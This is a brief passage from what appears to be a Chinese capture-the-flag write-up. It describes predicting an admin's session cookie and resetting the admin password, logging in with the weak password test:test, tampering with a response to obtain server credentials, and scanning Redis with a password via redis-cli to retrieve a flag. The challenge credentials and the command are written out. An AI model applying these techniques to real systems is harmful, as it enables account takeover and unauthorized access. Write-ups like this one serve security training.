不停地注册跟admin类似的账号,观察cookie中PHPLOG字段的变化规律,预测出admin用户的cookie为PHPLOG=TRMoVRz7,然后重置管理员的账号密码获得flag

第八题

服务器有弱口令test:test,通过修改数据包返回一个xcloud:xcloud13e7的服务器的账号密码,登录后发现存在redis,但是大部分命令被禁掉了.

使用

redis-cli --scan -a g00djob

扫描到一个key,查看这个键值对即可获得flag
